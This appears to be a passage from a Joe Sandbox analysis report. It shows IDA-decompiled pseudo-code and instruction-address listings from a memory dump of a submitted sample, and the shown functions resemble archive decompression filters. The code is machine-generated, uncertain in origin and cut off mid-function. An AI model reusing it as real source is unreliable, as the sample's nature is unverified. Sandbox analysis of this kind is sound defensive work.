														_t245 =  *(_t466 + 0x397c + _t244 * 2) & 0x0000ffff;
														L87:
														_t246 = _t245 & 0x0000ffff;
														__eflags = _t246 - 8;
														if(_t246 >= 8) {
															_t362 = 3;
															_t329 = (_t246 >> 2) - 1;
															_t445 = ((_t246 & _t362 | 0x00000004) << _t329) + 2;
															 *(_t479 + 0x2c) = _t445;
															__eflags = _t329;
															if(_t329 != 0) {
																_t250 = E00A3A89D(_t465);
																_t365 = 0x10;
																_t445 =  *(_t479 + 0x2c) + (_t250 >> _t365 - _t329);
																_t368 =  *(_t479 + 0x30) + _t329;
																 *_t465 =  *_t465 + (_t368 >> 3);
																_t369 = _t368 & 0x00000007;
																__eflags = _t369;
																_t465[1] = _t369;
															}
														} else {
															_t445 = _t246 + 2;
														}
														_t470[1] = _t445;
														L33:
														_t322 =  *(_t479 + 0x10);
														L34:
														_t436 =  *(_t479 + 0x1c);
														_t223 =  *(_t479 + 0x20);
														_t468 =  *(_t479 + 0x14);
														continue;
													}
													_t371 = _t466 + 0x2cf8 + _t241 * 4;
													while(1) {
														__eflags = _t442 -  *_t371;
														if(_t442 <  *_t371) {
															break;
														}
														_t241 = _t241 + 1;
														_t371 = _t371 + 4;
														__eflags = _t241 - 0xf;
														if(_t241 < 0xf) {
															continue;
														}
														goto L86;
													}
													_t326 = _t241;
													goto L86;
												}
												_t372 = 0x10;
												_t447 = _t442 >> _t372 - _t240;
												_t331 = ( *(_t447 + _t466 + 0x2d7c) & 0x000000ff) + _t465[1];
												 *_t465 =  *_t465 + (_t331 >> 3);
												_t332 = _t331 & 0x00000007;
												_t465[1] = _t332;
												_t245 =  *(_t466 + 0x317c + _t447 * 2) & 0x0000ffff;
												 *(_t479 + 0x30) = _t332;
												goto L87;
											}
											 *_t470 = 2;
											goto L33;
										}
										_push(_t479 + 0x38);
										E00A43F9D( *((intOrPtr*)(_t479 + 0x34)), _t465);
										_t322 =  *(_t479 + 0x10);
										_t470[1] =  *(_t479 + 0x38) & 0x000000ff;
										_t470[2] =  *(_t479 + 0x3c);
										_t448 = 4;
										 *_t470 = _t448;
										_t260 =  *(_t466 + 0x4ad8);
										_t376 = _t260 * 0xc +  *_t322;
										 *(_t466 + 0x4ad8) = _t260 + 1;
										_t376[1] =  *(_t479 + 0x44) & 0x000000ff;
										 *_t376 = _t448;
										_t376[2] =  *(_t479 + 0x40);
										goto L34;
									}
									_t264 = _t353 - 0x106;
									__eflags = _t264 - 8;
									if(_t264 >= 8) {
										_t449 = 3;
										_t379 = (_t264 >> 2) - 1;
										 *(_t479 + 0x30) = _t379;
										 *(_t479 + 0x24) = ((_t264 & _t449 | 0x00000004) << _t379) + 2;
										__eflags = _t379;
										if(_t379 != 0) {
											_t305 = E00A3A89D(_t465);
											_t340 = _t325 +  *(_t479 + 0x30);
											_t422 = 0x10;
											 *(_t479 + 0x24) =  *(_t479 + 0x24) + (_t305 >> _t422 -  *(_t479 + 0x30));
											_t425 =  *(_t479 + 0x18) + (_t340 >> 3);
											_t325 = _t340 & 0x00000007;
											__eflags = _t325;
											 *(_t479 + 0x18) = _t425;
											 *_t465 = _t425;
											_t465[1] = _t325;
										}
									} else {
										 *(_t479 + 0x24) = _t264 + 2;
									}
									_t269 = E00A3A89D(_t465);
									_t270 =  *(_t466 + 0xfa0);
									_t451 = _t269 & 0x0000fffe;
									__eflags = _t451 -  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4));
									if(_t451 >=  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4))) {
										_t333 = 0xf;
										_t271 = _t270 + 1;
										__eflags = _t271 - _t333;
										if(_t271 >= _t333) {
											L49:
											_t382 = _t465[1] + _t333;
											_t383 = _t382 & 0x00000007;
											_t465[1] = _t383;
											 *_t465 =  *_t465 + (_t382 >> 3);
											_t274 =  *_t465;
											 *(_t479 + 0x18) = _t383;
											_t384 = 0x10;
											 *(_t479 + 0x28) = _t274;
											_t387 =  *((intOrPtr*)(_t466 + 0xf60 + _t333 * 4)) + (_t451 -  *((intOrPtr*)(_t466 + 0xf1c + _t333 * 4)) >> _t384 - _t333);
											__eflags = _t387 -  *((intOrPtr*)(_t466 + 0xf1c));
											asm("sbb eax, eax");
											_t275 = _t274 & _t387;
											__eflags = _t275;
											_t276 =  *(_t466 + 0x1ba4 + _t275 * 2) & 0x0000ffff;
											goto L50;
										}
										_t418 = _t466 + 0xf20 + _t271 * 4;
										while(1) {
											__eflags = _t451 -  *_t418;
											if(_t451 <  *_t418) {
												break;
											}
											_t271 = _t271 + 1;
											_t418 = _t418 + 4;
											__eflags = _t271 - 0xf;
											if(_t271 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t333 = _t271;
										goto L49;
									} else {
										_t419 = 0x10;
										_t459 = _t451 >> _t419 - _t270;
										 *(_t479 + 0x30) = _t459;
										_t461 = ( *(_t459 + _t466 + 0xfa4) & 0x000000ff) + _t325;
										_t303 = (_t461 >> 3) +  *(_t479 + 0x18);
										_t462 = _t461 & 0x00000007;
										 *(_t479 + 0x28) = _t303;
										 *_t465 = _t303;
										_t465[1] = _t462;
										 *(_t479 + 0x18) = _t462;
										_t276 =  *(_t466 + 0x13a4 +  *(_t479 + 0x30) * 2) & 0x0000ffff;
										L50:
										_t277 = _t276 & 0x0000ffff;
										__eflags = _t277 - 4;
										if(_t277 >= 4) {
											_t473 = (_t277 >> 1) - 1;
											_t281 = ((_t277 & 0x00000001 | 0x00000002) << _t473) + 1;
											 *(_t479 + 0x30) = _t281;
											_t334 = _t281;
											__eflags = _t473;
											if(_t473 == 0) {
												L68:
												_t470 =  *(_t479 + 0x2c);
												L69:
												_t282 =  *(_t479 + 0x24);
												__eflags = _t334 - 0x100;
												if(_t334 > 0x100) {
													_t282 = _t282 + 1;
													__eflags = _t334 - 0x2000;
													if(_t334 > 0x2000) {
														_t282 = _t282 + 1;
														__eflags = _t334 - 0x40000;
														if(_t334 > 0x40000) {
															_t282 = _t282 + 1;
															__eflags = _t282;
														}
													}
												}
												 *_t470 = 1;
												_t470[1] = _t282;
												_t470[2] = _t334;
												goto L33;
											}
											__eflags = _t473 - 4;
											if(__eflags < 0) {
												_t283 = E00A48934(_t465);
												_t390 = 0x20;
												_t334 = (_t283 >> _t390 - _t473) +  *(_t479 + 0x30);
												_t393 =  *(_t479 + 0x18) + _t473;
												_t394 = _t393 & 0x00000007;
												__eflags = _t394;
												 *_t465 = (_t393 >> 3) +  *(_t479 + 0x28);
												_t465[1] = _t394;
												goto L68;
											}
											if(__eflags <= 0) {
												_t474 =  *(_t479 + 0x28);
											} else {
												_t298 = E00A48934(_t465);
												_t411 = 0x24;
												_t334 = (_t298 >> _t411 - _t473 << 4) +  *(_t479 + 0x30);
												_t415 =  *(_t479 + 0x18) + 0xfffffffc + _t473;
												_t474 =  *(_t479 + 0x28) + (_t415 >> 3);
												_t416 = _t415 & 0x00000007;
												 *_t465 = _t474;
												 *(_t479 + 0x18) = _t416;
												_t465[1] = _t416;
											}
											_t287 = E00A3A89D(_t465);
											_t288 =  *(_t466 + 0x1e8c);
											_t455 = _t287 & 0x0000fffe;
											__eflags = _t455 -  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4));
											if(_t455 >=  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4))) {
												_t475 = 0xf;
												_t289 = _t288 + 1;
												__eflags = _t289 - _t475;
												if(_t289 >= _t475) {
													L65:
													_t397 = _t465[1] + _t475;
													_t465[1] = _t397 & 0x00000007;
													_t291 = _t397 >> 3;
													 *_t465 =  *_t465 + _t291;
													_t399 = 0x10;
													_t402 =  *((intOrPtr*)(_t466 + 0x1e4c + _t475 * 4)) + (_t455 -  *((intOrPtr*)(_t466 + 0x1e08 + _t475 * 4)) >> _t399 - _t475);
													__eflags = _t402 -  *((intOrPtr*)(_t466 + 0x1e08));
													asm("sbb eax, eax");
													_t292 = _t291 & _t402;
													__eflags = _t292;
													_t293 =  *(_t466 + 0x2a90 + _t292 * 2) & 0x0000ffff;
													goto L66;
												}
												_t404 = _t466 + 0x1e0c + _t289 * 4;
												while(1) {
													__eflags = _t455 -  *_t404;
													if(_t455 <  *_t404) {
														break;
													}
													_t289 = _t289 + 1;
													_t404 = _t404 + 4;
													__eflags = _t289 - 0xf;
													if(_t289 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t475 = _t289;
												goto L65;
											} else {
												_t405 = 0x10;
												_t458 = _t455 >> _t405 - _t288;
												_t408 = ( *(_t458 + _t466 + 0x1e90) & 0x000000ff) +  *(_t479 + 0x18);
												 *_t465 = (_t408 >> 3) + _t474;
												_t465[1] = _t408 & 0x00000007;
												_t293 =  *(_t466 + 0x2290 + _t458 * 2) & 0x0000ffff;
												L66:
												_t334 = _t334 + (_t293 & 0x0000ffff);
												goto L68;
											}
										}
										_t334 = _t277 + 1;
										goto L69;
									}
								}
								__eflags =  *(_t466 + 0x4ad8) - 1;
								if( *(_t466 + 0x4ad8) <= 1) {
									L35:
									 *_t470 =  *_t470 & 0x00000000;
									_t470[2] = _t353;
									_t470[1] = 0;
									goto L33;
								}
								__eflags =  *(_t470 - 0xc);
								if( *(_t470 - 0xc) != 0) {
									goto L35;
								}
								_t310 =  *(_t470 - 8) & 0x0000ffff;
								_t463 = 3;
								__eflags = _t310 - _t463;
								if(_t310 >= _t463) {
									goto L35;
								}
								_t311 = _t310 + 1;
								 *(_t470 - 8) = _t311;
								 *((_t311 & 0x0000ffff) + _t470 - 4) = _t353;
								_t72 = _t466 + 0x4ad8;
								 *_t72 =  *(_t466 + 0x4ad8) - 1;
								__eflags =  *_t72;
								goto L33;
							}
						}
					}
					L3:
					 *((char*)(_t466 + 0x4ad0)) = 1;
					return _t220;
				}
				 *((char*)(_t466 + 0x2c)) = 1;
				_push(_t466 + 0x30);
				_push(_t321);
				_push(_t465);
				_t220 = E00A443BF(__ecx);
				if(_t220 == 0) {
					goto L3;
				}
				goto L2;
			}

0x00a47158
0x00a4715d
0x00a47165
0x00a47168
0x00a4716b
0x00a47180
0x00a47183
0x00a47185
0x00a47189
0x00a471a1
0x00a471a8
0x00a471aa
0x00a471ad
0x00a471b1
0x00a471b6
0x00a471b8
0x00a471c2
0x00a471c4
0x00a471ba
0x00a471ba
0x00a471bc
0x00a471bc
0x00a471c8
0x00a471ce
0x00a471ce
0x00a471d0
0x00a471d4
0x00a471d6
0x00000000
0x00000000
0x00a471d8
0x00a471da
0x00a477b6
0x00000000
0x00a477b6
0x00a471e0
0x00a471ee
0x00a471ee
0x00a471f0
0x00a471ff
0x00a471ff
0x00a47205
0x00a47207
0x00a4720b
0x00a47211
0x00a477af
0x00a477af
0x00000000
0x00a477af
0x00000000
0x00a47211
0x00a471f2
0x00a471f9
0x00000000
0x00000000
0x00000000
0x00a471f9
0x00a471e2
0x00a471e5
0x00a471e8
0x00000000
0x00000000
0x00000000
0x00a47217
0x00a47217
0x00a47220
0x00a47226
0x00a47228
0x00a4722b
0x00a47234
0x00a47235
0x00a4723c
0x00a47240
0x00a47242
0x00a47249
0x00a47249
0x00a4724e
0x00a4724e
0x00a47250
0x00a4725b
0x00a4725e
0x00a47262
0x00a47268
0x00a4726f
0x00a47275
0x00a4727b
0x00a4727f
0x00a472b2
0x00a472b3
0x00a472b4
0x00a472b8
0x00a472ba
0x00a472db
0x00a472de
0x00a472e2
0x00a472e8
0x00a472ec
0x00a472f0
0x00a472f4
0x00a472f9
0x00a47306
0x00a47308
0x00a4730b
0x00a4730d
0x00a4730d
0x00a4730f
0x00000000
0x00a4730f
0x00a472bf
0x00a472c2
0x00a472c2
0x00a472c4
0x00000000
0x00000000
0x00a472c6
0x00a472c7
0x00a472ca
0x00a472cd
0x00000000
0x00000000
0x00a472cf
0x00000000
0x00a472cf
0x00a472d5
0x00a472d7
0x00000000
0x00a47281
0x00a47283
0x00a47286
0x00a47290
0x00a47298
0x00a4729a
0x00a4729f
0x00a472a3
0x00a472a6
0x00a47317
0x00a47317
0x00a4731f
0x00a47321
0x00a47374
0x00a4737a
0x00a47630
0x00a47632
0x00a47686
0x00a4768c
0x00a4769c
0x00a4769d
0x00a476a8
0x00a476ab
0x00a476b2
0x00a476b8
0x00a476be
0x00a476c5
0x00a476f6
0x00a476f7
0x00a476f8
0x00a476fa
0x00a47716
0x00a47719
0x00a4771d
0x00a47720
0x00a47723
0x00a47726
0x00a4772f
0x00a47735
0x00a47741
0x00a47743
0x00a47749
0x00a4774b
0x00a4774b
0x00a4774d
0x00a47755
0x00a47755
0x00a47758
0x00a4775b
0x00a47769
0x00a4776c
0x00a47774
0x00a47777
0x00a4777b
0x00a4777d
0x00a47781
0x00a4778c
0x00a47795
0x00a47797
0x00a4779e
0x00a477a0
0x00a477a0
0x00a477a3
0x00a477a3
0x00a4775d
0x00a4775d
0x00a4775d
0x00a477a6
0x00a47350
0x00a47350
0x00a47354
0x00a47354
0x00a47358
0x00a4735c
0x00000000
0x00a4735c
0x00a47702
0x00a47705
0x00a47705
0x00a47707
0x00000000
0x00000000
0x00a47709
0x00a4770a
0x00a4770d
0x00a47710
0x00000000
0x00000000
0x00000000
0x00a47712
0x00a47714
0x00000000
0x00a47714
0x00a476c9
0x00a476cc
0x00a476d6
0x00a476de
0x00a476e0
0x00a476e3
0x00a476e6
0x00a476ee
0x00000000
0x00a476ee
0x00a4768e
0x00000000
0x00a4768e
0x00a4763c
0x00a4763e
0x00a47648
0x00a4764c
0x00a47654
0x00a47659
0x00a4765a
0x00a4765d
0x00a47666
0x00a47669
0x00a47674
0x00a4767c
0x00a4767e
0x00000000
0x00a4767e
0x00a47380
0x00a47386
0x00a47389
0x00a473a0
0x00a473a6
0x00a473af
0x00a473b3
0x00a473b7
0x00a473b9
0x00a473bd
0x00a473c2
0x00a473c8
0x00a473cf
0x00a473dc
0x00a473de
0x00a473de
0x00a473e1
0x00a473e5
0x00a473e7
0x00a473e7
0x00a4738b
0x00a47396
0x00a47396
0x00a473ec
0x00a473f3
0x00a473f9
0x00a473ff
0x00a47406
0x00a47446
0x00a47447
0x00a47448
0x00a4744a
0x00a47466
0x00a47469
0x00a4746d
0x00a47470
0x00a47476
0x00a4747f
0x00a47481
0x00a47487
0x00a4748a
0x00a47497
0x00a47499
0x00a4749f
0x00a474a1
0x00a474a1
0x00a474a3
0x00000000
0x00a474a3
0x00a47452
0x00a47455
0x00a47455
0x00a47457
0x00000000
0x00000000
0x00a47459
0x00a4745a
0x00a4745d
0x00a47460
0x00000000
0x00000000
0x00000000
0x00a47462
0x00a47464
0x00000000
0x00a47408
0x00a4740a
0x00a4740d
0x00a4740f
0x00a4741b
0x00a47422
0x00a47426
0x00a47429
0x00a4742d
0x00a47433
0x00a47436
0x00a4743a
0x00a474ab
0x00a474ab
0x00a474ae
0x00a474b1
0x00a474c5
0x00a474ca
0x00a474cb
0x00a474cf
0x00a474d1
0x00a474d3
0x00a475fa
0x00a475fa
0x00a475fe
0x00a475fe
0x00a47602
0x00a47608
0x00a4760a
0x00a4760b
0x00a47611
0x00a47613
0x00a47614
0x00a4761a
0x00a4761c
0x00a4761c
0x00a4761c
0x00a4761a
0x00a47611
0x00a4761d
0x00a47624
0x00a47628
0x00000000
0x00a47628
0x00a474d9
0x00a474dc
0x00a475d1
0x00a475da
0x00a475e3
0x00a475e7
0x00a475f2
0x00a475f2
0x00a475f5
0x00a475f7
0x00000000
0x00a475f7
0x00a474e2
0x00a4751d
0x00a474e4
0x00a474e6
0x00a474ef
0x00a474fe
0x00a47502
0x00a4750d
0x00a4750f
0x00a47512
0x00a47514
0x00a47518
0x00a47518
0x00a47523
0x00a4752a
0x00a47530
0x00a47536
0x00a4753d
0x00a4756d
0x00a4756e
0x00a4756f
0x00a47571
0x00a4758d
0x00a47590
0x00a47597
0x00a4759a
0x00a4759d
0x00a475a8
0x00a475b4
0x00a475b6
0x00a475bc
0x00a475be
0x00a475be
0x00a475c0
0x00000000
0x00a475c0
0x00a47579
0x00a4757c
0x00a4757c
0x00a4757e
0x00000000
0x00000000
0x00a47580
0x00a47581
0x00a47584
0x00a47587
0x00000000
0x00000000
0x00000000
0x00a47589
0x00a4758b
0x00000000
0x00a4753f
0x00a47541
0x00a47544
0x00a4754e
0x00a4755c
0x00a4755e
0x00a47561
0x00a475c8
0x00a475cb
0x00000000
0x00a475cb
0x00a4753d
0x00a474b3
0x00000000
0x00a474b3
0x00a47406
0x00a47323
0x00a4732a
0x00a47365
0x00a47365
0x00a4736b
0x00a4736e
0x00000000
0x00a4736e
0x00a4732c
0x00a47330
0x00000000
0x00000000
0x00a47332
0x00a47338
0x00a47339
0x00a4733c
0x00000000
0x00000000
0x00a4733e
0x00a4733f
0x00a47346
0x00a4734a
0x00a4734a
0x00a4734a
0x00000000
0x00a4734a
0x00a4727f
0x00a471ce
0x00a4718b
0x00a4718b
0x00000000
0x00a4718b
0x00a47170
0x00a47174
0x00a47175
0x00a47176
0x00a47177
0x00a4717e
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f065cc03163b096130e74f3cb44f67c3d1994ffcc709d50835b122868d84f16e
Instruction ID: 7868cffee06edb7ff517a5977f8599682e33af26f7f0d85abb7e72df3767e237
Opcode Fuzzy Hash: f065cc03163b096130e74f3cb44f67c3d1994ffcc709d50835b122868d84f16e
Instruction Fuzzy Hash: FA12C2B56087468FC728CF28C590ABDB7E1FF94304F10892EE996CB781E374A995CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00A3C426 Relevance: .5, Instructions: 454
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00A3C426(signed char** __ecx) {
				void* __edi;
				void* _t188;
				signed int _t189;
				char _t192;
				void* _t197;
				void* _t198;
				signed int _t201;
				signed char _t202;
				void* _t212;
				signed int _t213;
				signed int _t215;
				signed int _t216;
				signed char* _t217;
				void* _t218;
				intOrPtr _t222;
				signed char* _t225;
				signed char _t228;
				void* _t237;
				void* _t238;
				signed int _t239;
				signed int _t242;
				signed char* _t245;
				signed int _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;
				void* _t282;
				signed int _t286;
				intOrPtr _t287;
				void* _t288;
				signed char* _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				char _t293;
				intOrPtr* _t295;
				signed char _t296;
				signed int _t301;
				signed int _t302;
				intOrPtr _t304;
				intOrPtr* _t306;
				signed char* _t307;
				signed int _t308;
				signed int _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed char _t320;
				intOrPtr _t321;
				intOrPtr _t322;
				unsigned int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				void* _t331;
				signed char _t332;
				signed char* _t333;
				signed char _t335;
				signed int _t336;
				signed int _t337;
				void* _t338;
				void* _t339;
				void* _t340;
				signed int _t343;
				signed int _t344;
				signed char* _t345;
				signed int _t346;
				signed int _t348;
				intOrPtr _t350;
				signed int _t351;
				signed int _t354;
				void* _t358;
				signed int _t359;
				signed char* _t360;
				signed int _t361;
				void* _t362;
				void* _t363;

				_t349 = __ecx;
				_t188 =  *((intOrPtr*)(_t363 + 4)) - 1;
				if(_t188 == 0) {
					L84:
					_t189 =  *(_t349 + 0x14);
					_t295 =  *_t349;
					_t350 =  *((intOrPtr*)(_t349 + 0x1c));
					_t288 = _t189 - 4;
					if(_t288 > 0x3fffc) {
						L96:
						return 0;
					}
					_t338 = 0;
					_t192 = (_t189 & 0xffffff00 |  *((intOrPtr*)(_t363 + 0x64)) == 0x00000002) + 0xe8;
					 *((char*)(_t363 + 0x13)) = _t192;
					if(_t288 == 0) {
						L95:
						return 1;
					} else {
						goto L86;
					}
					do {
						L86:
						_t321 =  *_t295;
						_t295 = _t295 + 1;
						_t339 = _t338 + 1;
						_t350 = _t350 + 1;
						if(_t321 == 0xe8 || _t321 == _t192) {
							_t322 =  *_t295;
							if(_t322 >= 0) {
								if(_t322 - 0x1000000 < 0) {
									 *_t295 = _t322 - _t350;
								}
							} else {
								if(_t350 + _t322 >= 0) {
									 *_t295 = _t322 + 0x1000000;
								}
							}
							_t192 =  *((intOrPtr*)(_t363 + 0x13));
							_t295 = _t295 + 4;
							_t338 = _t339 + 4;
							_t350 = _t350 + 4;
						}
					} while (_t338 < _t288);
					goto L95;
				}
				_t197 = _t188 - 1;
				if(_t197 == 0) {
					goto L84;
				}
				_t198 = _t197 - 1;
				if(_t198 == 0) {
					_t289 =  *__ecx;
					_t340 = __ecx[5] - 0x15;
					if(_t340 > 0x3ffeb) {
						goto L96;
					}
					_t325 = __ecx[7] >> 4;
					 *(_t363 + 0x28) = _t325;
					if(_t340 == 0) {
						goto L95;
					}
					_t343 = (_t340 - 1 >> 4) + 1;
					 *(_t363 + 0x38) = _t343;
					do {
						_t201 =  *_t289 & 0x1f;
						if(_t201 < 0x10) {
							goto L82;
						}
						_t202 =  *((intOrPtr*)(_t201 + 0xa6e078));
						if(_t202 == 0) {
							goto L82;
						}
						_t344 =  *(_t363 + 0x28);
						_t296 = 0;
						_t326 = _t202 & 0x000000ff;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x40) = _t326;
						_t358 = 0x12;
						do {
							if((_t326 & 1) != 0) {
								_t168 = _t358 + 0x18; // 0x2a
								if(E00A3C985(_t289, _t168, 4) == 5) {
									E00A3C9D0(_t289, E00A3C985(_t289, _t358, 0x14) - _t344 & 0x000fffff, _t358, 0x14);
								}
								_t326 =  *(_t363 + 0x3c);
								_t296 =  *(_t363 + 0x2c);
							}
							_t296 = _t296 + 1;
							_t358 = _t358 + 0x29;
							 *(_t363 + 0x2c) = _t296;
						} while (_t358 <= 0x64);
						_t343 =  *(_t363 + 0x38);
						_t325 =  *(_t363 + 0x28);
						L82:
						_t289 =  &(_t289[0x10]);
						_t325 = _t325 + 1;
						_t343 = _t343 - 1;
						 *(_t363 + 0x28) = _t325;
						 *(_t363 + 0x38) = _t343;
					} while (_t343 != 0);
					goto L95;
				}
				_t212 = _t198 - 1;
				if(_t212 == 0) {
					_t213 = __ecx[1];
					_t345 = __ecx[5];
					 *(_t363 + 0x18) = _t213;
					_t290 = _t213 - 3;
					if(_t345 - 3 > 0x1fffd || _t290 > _t345) {
						goto L96;
					} else {
						_t215 = __ecx[2];
						 *(_t363 + 0x20) = _t215;
						if(_t215 > 2) {
							goto L96;
						}
						_t216 =  *__ecx;
						 *(_t363 + 0x14) = _t216;
						_t359 = 3;
						_t351 =  &(_t345[_t216]);
						_t217 = 0;
						 *(_t363 + 0x24) = _t351;
						_t301 = _t351 - _t290;
						 *(_t363 + 0x30) = 0;
						 *(_t363 + 0x28) = _t301;
						do {
							_t291 = 0;
							if(_t217 >= _t345) {
								goto L65;
							}
							_t327 =  *(_t363 + 0x18);
							_t360 =  &(_t217[_t301]);
							_t302 =  *(_t363 + 0x14);
							_t225 =  *(_t363 + 0x18) + 0xfffffffd - _t351;
							 *(_t363 + 0x34) = _t225;
							do {
								if( &(_t225[_t360]) >= _t327) {
									 *(_t363 + 0x3c) =  *_t360 & 0x000000ff;
									 *(_t363 + 0x3c) =  *(_t360 - 3) & 0x000000ff;
									 *(_t363 + 0x44) = E00A5614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff));
									 *(_t363 + 0x38) = E00A5614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t237 = E00A5614A(_t327, ( *_t360 & 0x000000ff) - ( *(_t360 - 3) & 0x000000ff) + _t291 -  *(_t363 + 0x40));
									_t304 =  *((intOrPtr*)(_t363 + 0x4c));
									_t363 = _t363 + 0xc;
									_t332 =  *(_t363 + 0x2c);
									if(_t304 > _t332 || _t304 > _t237) {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
										_t291 =  *(_t363 + 0x3c);
										if(_t332 > _t237) {
											_t291 =  *(_t363 + 0x38);
										}
									} else {
										_t302 =  *(_t363 + 0x14);
										_t327 =  *(_t363 + 0x18);
									}
								}
								_t228 = _t291 -  *_t302;
								_t302 = _t302 + 1;
								(_t360 - 3)[_t327] = _t228;
								_t360 =  &(_t360[3]);
								_t291 = _t228 & 0x000000ff;
								 *(_t363 + 0x14) = _t302;
								_t225 =  *(_t363 + 0x34);
							} while ( &(( *(_t363 + 0x34))[_t360]) < _t345);
							_t217 =  *(_t363 + 0x30);
							_t301 =  *(_t363 + 0x28);
							_t351 =  *(_t363 + 0x24);
							_t359 = 3;
							L65:
							_t217 =  &(_t217[1]);
							 *(_t363 + 0x30) = _t217;
						} while (_t217 < _t359);
						_t328 =  *(_t363 + 0x20);
						_t218 = _t345 - 2;
						if(_t328 >= _t218) {
							goto L95;
						}
						_t306 = _t328 + 2 + _t351;
						_t331 = (_t218 - _t328 - 1) / _t359 + 1;
						do {
							_t222 =  *((intOrPtr*)(_t306 - 1));
							 *((intOrPtr*)(_t306 - 2)) =  *((intOrPtr*)(_t306 - 2)) + _t222;
							 *_t306 =  *_t306 + _t222;
							_t306 = _t306 + _t359;
							_t331 = _t331 - 1;
						} while (_t331 != 0);
						goto L95;
					}
				}
				_t238 = _t212 - 1;
				if(_t238 == 0) {
					_t307 = __ecx[5];
					_t333 =  *__ecx;
					_t239 = __ecx[1];
					 *(_t363 + 0x30) = _t333;
					 *(_t363 + 0x34) = _t307;
					 *(_t363 + 0x38) = _t239;
					 *(_t363 + 0x40) =  &(_t333[_t307]);
					if(_t307 > 0x20000 || _t239 > 0x80 || _t239 == 0) {
						goto L96;
					} else {
						_t346 = 0;
						 *(_t363 + 0x3c) = 0;
						if(_t239 == 0) {
							goto L95;
						} else {
							goto L20;
						}
						do {
							L20:
							 *(_t363 + 0x24) =  *(_t363 + 0x24) & 0x00000000;
							 *(_t363 + 0x20) =  *(_t363 + 0x20) & 0x00000000;
							_t354 = 0;
							 *(_t363 + 0x1c) =  *(_t363 + 0x1c) & 0x00000000;
							_t292 = 0;
							 *(_t363 + 0x18) =  *(_t363 + 0x18) & 0x00000000;
							_t361 = 0;
							 *(_t363 + 0x20) = 0;
							E00A4FFF0(_t346, _t363 + 0x44, 0, 0x1c);
							 *(_t363 + 0x38) =  *(_t363 + 0x38) & 0;
							_t363 = _t363 + 0xc;
							 *(_t363 + 0x28) = _t346;
							if(_t346 >=  *(_t363 + 0x34)) {
								_t242 =  *(_t363 + 0x38);
								goto L49;
							} else {
								goto L21;
							}
							do {
								L21:
								_t308 =  *(_t363 + 0x20);
								 *(_t363 + 0x18) = _t308 -  *(_t363 + 0x1c);
								_t245 =  *(_t363 + 0x30);
								 *(_t363 + 0x1c) = _t308;
								_t335 =  *_t245;
								 *(_t363 + 0x30) =  &(_t245[1]);
								_t314 = ( *(_t363 + 0x18) * _t354 + _t361 *  *(_t363 + 0x18) + _t292 *  *(_t363 + 0x20) +  *(_t363 + 0x24) * 0x00000008 >> 0x00000003 & 0x000000ff) - (_t335 & 0x000000ff);
								 *( *(_t363 + 0x28) +  *(_t363 + 0x40)) = _t314;
								_t357 = _t335 << 3;
								 *(_t363 + 0x24) = _t314 -  *(_t363 + 0x24);
								 *(_t363 + 0x28) = _t314;
								 *((intOrPtr*)(_t363 + 0x48)) =  *((intOrPtr*)(_t363 + 0x48)) + E00A5614A(_t335, _t335 << 3);
								 *((intOrPtr*)(_t363 + 0x50)) =  *((intOrPtr*)(_t363 + 0x50)) + E00A5614A(_t335, (_t335 << 3) -  *(_t363 + 0x20));
								 *((intOrPtr*)(_t363 + 0x58)) =  *((intOrPtr*)(_t363 + 0x58)) + E00A5614A(_t335,  *(_t363 + 0x24) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x60)) =  *((intOrPtr*)(_t363 + 0x60)) + E00A5614A(_t335, (_t335 << 3) -  *(_t363 + 0x24));
								 *((intOrPtr*)(_t363 + 0x68)) =  *((intOrPtr*)(_t363 + 0x68)) + E00A5614A(_t335,  *(_t363 + 0x28) + (_t335 << 3));
								 *((intOrPtr*)(_t363 + 0x70)) =  *((intOrPtr*)(_t363 + 0x70)) + E00A5614A(_t335, _t357 -  *(_t363 + 0x18));
								 *((intOrPtr*)(_t363 + 0x78)) =  *((intOrPtr*)(_t363 + 0x78)) + E00A5614A(_t335, _t357 +  *(_t363 + 0x18));
								_t363 = _t363 + 0x1c;
								if(( *(_t363 + 0x2c) & 0x0000001f) != 0) {
									_t354 =  *(_t363 + 0x14);
								} else {
									_t336 =  *(_t363 + 0x44);
									_t277 = 0;
									 *(_t363 + 0x44) =  *(_t363 + 0x44) & 0;
									_t318 = 1;
									do {
										if( *(_t363 + 0x44 + _t318 * 4) < _t336) {
											_t336 =  *(_t363 + 0x44 + _t318 * 4);
											_t277 = _t318;
										}
										 *(_t363 + 0x44 + _t318 * 4) =  *(_t363 + 0x44 + _t318 * 4) & 0x00000000;
										_t318 = _t318 + 1;
									} while (_t318 < 7);
									_t354 =  *(_t363 + 0x14);
									_t278 = _t277 - 1;
